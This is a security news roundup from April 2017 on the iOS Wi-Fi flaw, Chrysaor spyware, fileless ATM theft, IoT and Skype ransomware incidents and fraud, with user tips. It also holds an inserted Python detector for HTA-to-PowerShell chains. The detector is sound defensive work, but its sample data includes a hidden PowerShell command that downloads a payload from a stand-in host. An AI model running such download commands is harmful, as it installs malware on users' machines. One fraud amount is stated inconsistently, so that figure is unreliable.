Data Security News Headlines 5th April 2017

  1. Update Your Apple Devices to iOS 10.3.1 to Avoid Being Hacked Over Wi-Fi

Security researchers found a few critical vulnerabilities in iOS 10.3, one of which could allow hackers to “execute arbitrary code on the Wi-Fi chip.” The vulnerability, identified as CVE-2017-6975, was discovered by Google’s Project Zero staffer Gal Beniamini. Apple describes the issue as a stack buffer overflow vulnerability, which the company addressed by improving input validation. A stack buffer overflow flaw occurs when the execution stack grows beyond the memory that is reserved for it, allowing hackers to execute malicious code remotely. Successful exploitation could allow an attacker within range to execute malicious code on the phone’s Wi-Fi chip. The vulnerability appears to affect iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation and later devices running the iOS 10.3 operating system, according to news published by The Hacker News.

Cyber Security Tips: Apple users who are running iOS 10.3 are recommended to update to iOS 10.3.1. The iOS 10.3.1 update can be downloaded via Settings → General → Software Update on your iOS device.

  1. Google just discovered a dangerous Android Spyware that went undetected for 3 Years

Android spyware is nothing new. Researchers at Lookout and Google discovered spyware called Chrysaor, which remained undetected for at least three years thanks to its smart self-destruction capabilities. The Android spyware has been used in targeted attacks against activists and journalists, mostly in Israel but also in Georgia, Turkey, Mexico, the UAE and other countries. Once installed, the spyware can: exfiltrate data from popular apps including Gmail, WhatsApp, Skype, Facebook and Twitter; control the device remotely; record live audio and video; log keystrokes and capture screenshots; disable system updates to prevent vulnerability patching; spy on contacts, text messages, emails and browser history; and self-destruct to evade detection.

Researchers said that this malware was also distributed via SMS-based phishing messages.

Cyber Security Tips: Users are recommended to install applications from trusted sources only, never click on links in suspicious messages, keep their devices password protected, keep their applications up to date and enable the ‘verify apps’ feature in settings.

  1. Hackers stole $800,000 from ATMs using Fileless Malware

Hackers targeted at least 8 ATMs in Russia and stole $800,000 in a single night using fileless malware. Fileless malware is malicious code that does not use files to launch the attack or to carry on the infection on the affected device or network; the infection runs in the device’s RAM. The affected banks could not find any trace of malware on their ATMs or backend network, or any sign of an intrusion. The only thing the bank found on the hard drive was two files containing malware logs. The log files included two process strings containing the phrases “Take the Money Bitch!” and “Dispense Success.” According to the researchers, the attacks against the banks were carried out using fileless malware that resides solely in the memory (RAM) of the infected ATMs rather than on the hard drive. The ATM theft takes just a few seconds to complete, without the operator physically going near the machine. Once the ATM has been emptied, the operator ‘signs off,’ leaving very little trace, if any, of the malware.

Cyber Security Tips: To protect yourself from fileless malware, apply security updates for your applications and operating system, block the pages hosting the exploit kit, keep using a reputed antivirus and keep your device physically secured.

  1. Android is now world’s most popular Operating System

According to a new report from web traffic analytics firm StatCounter, Google’s Android is the most popular operating system worldwide in terms of total internet usage across desktop, laptop, tablet, and mobile combined. Android represented 37.93 percent of the global OS internet usage market share in March, while Windows accounted for 37.91 percent. The report showed that Windows still holds 39.5 percent of the internet usage market share against Android’s 25.7 percent in North America, and 51.7 percent against 29.2 percent in Europe.

  1. Hackers can take over Smart Dildos and stream videos online

Researchers have discovered a simple way to hack an Internet-connected vibrator that comes equipped with a camera. After the device is hacked, its video can be streamed live, and the user might not even know what happened. Researchers at security firm Pen Test Partners found that a device called the Svakom Siime Eye, which costs about $250, is easy to hack; this is possible because the dildo comes with a video camera with streaming capability. The problem arises from the unsecured connection: anyone who is within range of the dildo’s Wi-Fi connection and can guess its password can quickly “join in on the fun.” The device’s default password is 88888888, and if the user forgets to change the default login credentials, the hacker can remotely take control of the firmware and exploit the situation by live-streaming the video without the victim’s knowledge, according to news published by HackRead.

Cyber Security Tips: Hacking of IoT devices is nothing new. Users are recommended to keep their home Wi-Fi secured with strong encryption as well as a strong password, keep their smart devices up to date and change default credentials.

  1. Skype users hit by ransomware

Skype is an instant messaging app that provides online text message and video chat services. Users may transmit both text and video messages and may exchange digital documents such as images, text, and video. For the past few days, Skype users have noticed that the instant messaging service served malware masquerading as a fake Flash Player update. The fake Flash Player update contains an HTA file (HTML application file) and was designed to execute a PowerShell script to download a payload. The payload could be a JSE (encrypted JavaScript). The file was probably going to install a Trojan or ransomware on victims’ devices. The malicious ransomware called oyomakaomojiya[.]org and cievubeataporn[.]net.

Cyber Security Tips: Skype users are strongly recommended never to click on such notifications, to avoid installing Flash Player from such notifications, and to keep using a reputed antivirus and ransomware protection.
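The chain described in the Skype item above (an HTA file that runs PowerShell, which then downloads a JSE payload) leaves a recognisable parent/child process pattern. The following is an added example, not part of the original post: a small detection pass over constructed process-creation events that use Sysmon Event ID 1 field names. The rules, severity labels and sample events are assumptions made for illustration.

```python
import ntpath
import re

SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Arguments suggesting a network fetch, an encoded command or a hidden window.
DOWNLOAD_HINTS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|"
    r"\s-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)
JSE_ARG = re.compile(r"\.jse(\"|'|\s|$)", re.IGNORECASE)

# Constructed sample events (hypothetical hosts, users and paths).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c (New-Object Net.WebClient)"
                    ".DownloadFile('http://payload.example.invalid/u.jse','u.jse')"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\u.jse"'},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile Get-Date"},
]

def classify(event):
    """Return (severity, reason) for one process-creation event, or None."""
    child = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    cmd = event["CommandLine"]
    if parent == "mshta.exe" and child in SHELLS:
        if DOWNLOAD_HINTS.search(cmd):
            return ("high", "HTA launched PowerShell with download/hidden/encoded arguments")
        return ("medium", "HTA launched PowerShell")
    if child in SCRIPT_HOSTS and JSE_ARG.search(cmd):
        return ("medium", "script host executing an encoded JScript (.jse) file")
    return None

def scan(events):
    """Return [(index, severity, reason)] for every event that matched a rule."""
    return [(i, *v) for i, e in enumerate(events) if (v := classify(e))]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The explorer.exe-launched PowerShell session is deliberately left unflagged: the signal here is the parent process, not PowerShell itself.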

  1. Android apps can breach and share your personal data

If you use a smartphone with multiple apps, be aware that your personal data can be shared between them. A study showed that applications on Android phones are able to talk to one another and trade information. The biggest security risks were some of the least utilitarian apps, those that pertained to personalisation of ringtones, widgets, and emojis, the researchers said. The team examined a whopping 110,150 apps over three years, including 100,206 of Google Play’s most popular apps and 9,994 malware apps from Virus Share, a private collection of malware app samples. The researchers found thousands of pairs of apps that could potentially leak sensitive phone or personal information and allow unauthorized apps to gain access to privileged data.

Cyber Security Tips: Users are recommended to check app permissions while installing, install apps from trusted sources only, be careful when sharing any personal details over apps and keep using a reputed antivirus to detect malicious applications.

  1. Nia Sharma’s Instagram account gets HACKED!

Instagram is a mobile photo-sharing application and service that allows users to share pictures and videos either publicly or privately. Hacking of Instagram accounts is nothing new, and hackers are targeting celebrities. The latest victim is popular TV actress Nia Sharma: her Instagram account has been hacked and all her posts have been deleted. Nia has apparently filed a complaint. The reason for the hack is not yet clear.

Cyber Security Tips: To protect yourself from such hacks, use a strong password, change your password regularly, turn on two-way authentication, make sure your email account is secure, never click on “remember me”, think before you authorize any third-party app and log out.

  1. Cyber criminals dupe IAS officer of ₹73 lakh

Hackers are targeting banking users through social engineering. The latest victim is a senior officer of the Indian Administrative Service, who has lodged a complaint of cyber theft against unknown persons for allegedly duping him of ₹2.73 lakh after getting to know his ATM card details. According to the Ashok Nagar police, the FIR was lodged under relevant sections of the Information Technology Act on the complaint of JC Mohanty. “Mohanty lodged the FIR on Monday and has alleged that a fraudster, who introduced himself as an employee of the State Bank of Bikaner and Jaipur (SBBJ), debited ₹2.73 lakh after asking his ATM card details,” said a police official from the Ashok Nagar police station. The accused managed to debit the money after getting the ATM details and OTP number from Mohanty, as per the news published by Hindustan Times.

Cyber Security Tips: To protect yourself from such fraud, keep your bank data such as ATM card, PIN, password, one-time password and account numbers secure, and never share banking details.

 
